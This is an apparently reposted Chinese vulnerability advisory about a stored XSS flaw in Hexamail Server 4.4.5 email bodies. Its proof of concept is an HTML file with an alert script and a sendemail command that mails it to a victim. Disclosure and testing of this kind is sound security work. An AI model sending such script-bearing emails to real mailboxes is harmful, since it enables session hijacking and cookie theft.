发布日期:2012-06-04
更新日期:2012-06-05受影响系统:
Hexamail Hexamail Server 4.4.5
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 53769Hexamail Server是一款高级的邮件服务器,支持所有的标准邮件协议。Hexamail Server 4.4.5在邮件体的实现上存在XSS漏洞,通过发送恶意脚本到受害者电子邮件,邮箱可自动加载邮件体,无需授权,即可允许恶意用户在受害者浏览器中劫持用户会话,重定向用户,窃取Cookie身份验证凭证并控制站点外观。<*来源:modpr0be
链接:http://www.spentera.com/2012/06/hexamail-server-4-4-5-persistent-xss-vulnerability/
http://www.linuxidc.com/Linux/2012-06/62124.htm
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!root@bt:~/# cat > meal.txt
<html>
<body>
<h1>XSS pop up</h1>
<script>alert("Hi, what is this?");</script>
</body>
</html>
root@bt:~/#Send email to the victim:
root@bt:~/# sendemail -f bob@example.com -t david@example.com -xu bob@example.com
-xp bob123 -u "Want some meal..?" -o message-file=meal.txt -s mail.example.com建议:
--------------------------------------------------------------------------------
厂商补丁:Hexamail
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.hexamail.com/hexamailserver/PHP 5.3.10多个拒绝服务漏洞IrfanView Formats PlugIn "NCSEcw.dll"堆缓冲区溢出漏洞相关资讯 注入漏洞
- MyBB MyTube插件"mytube.php"HTML (12/19/2012 18:54:35)
- Sinapsi eSolar Light操作系统命令 (11/23/2012 10:52:27)
- MyBB "member.php" SQL注入漏洞 (06/08/2012 11:26:51)
| - Perl Locale::Maketext Module "_ (12/11/2012 08:12:29)
- Symantec Web Gateway代码注入漏洞 (07/24/2012 08:33:56)
- Cobbler远程命令注入漏洞 (05/31/2012 07:00:19)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
易网时代-编程资源站